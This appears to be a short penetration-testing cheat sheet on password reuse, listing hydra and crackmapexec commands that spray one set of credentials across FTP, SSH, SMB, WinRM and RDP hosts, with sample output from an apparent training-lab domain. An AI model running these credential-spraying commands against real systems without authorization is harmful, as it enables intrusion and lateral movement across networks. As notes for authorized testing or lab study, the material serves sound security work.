Skip to content

Pass the password

  • we have user with valid password
  • we want to check if the same user and password can be use enywhere else

ftp 

hydra -L user.txt -P pass.txt -M ip.txt ftp -I
ssh 
crackmapexec ssh ip.txt -u user.txt -p pass.txt --continue-on-success
smb 
crackmapexec smb ip.txt -u user.txt -p pass.txt --shares --continue-on-success
winrm 
crackmapexec winrm ip.txt -u user.txt -p pass.txt --continue-on-success
rdp 
crackmapexec rdp ip.txt -u user.txt -p pass.txt

Other

local administrator 

crackmapexec smb 172.16.7.1/23 -u CT059 -p charlie1
|->
SMB 172.16.7.3  445 DC01  [+] INLANEFREIGHT.LOCAL\CT059:charlie1 
SMB 172.16.7.50 445 MS01  [+] INLANEFREIGHT.LOCAL\CT059:charlie1 
SMB 172.16.7.60 445 SQL01 [+] INLANEFREIGHT.LOCAL\CT059:charlie1

domain user 

crackmapexec smb 172.16.7.1/23 -u CT059 -p charlie1 -d INLANEFREIGHT.LOCAL
|->
SMB 172.16.7.3  445 DC01  [+] INLANEFREIGHT.LOCAL\CT059:charlie1 
SMB 172.16.7.50 445 MS01  [+] INLANEFREIGHT.LOCAL\CT059:charlie1 
SMB 172.16.7.60 445 SQL01 [+] INLANEFREIGHT.LOCAL\CT059:charlie1


crackmapexec smb ip.txt -u user.txt -p pass.txt -d INLANEFREIGHT.LOCAL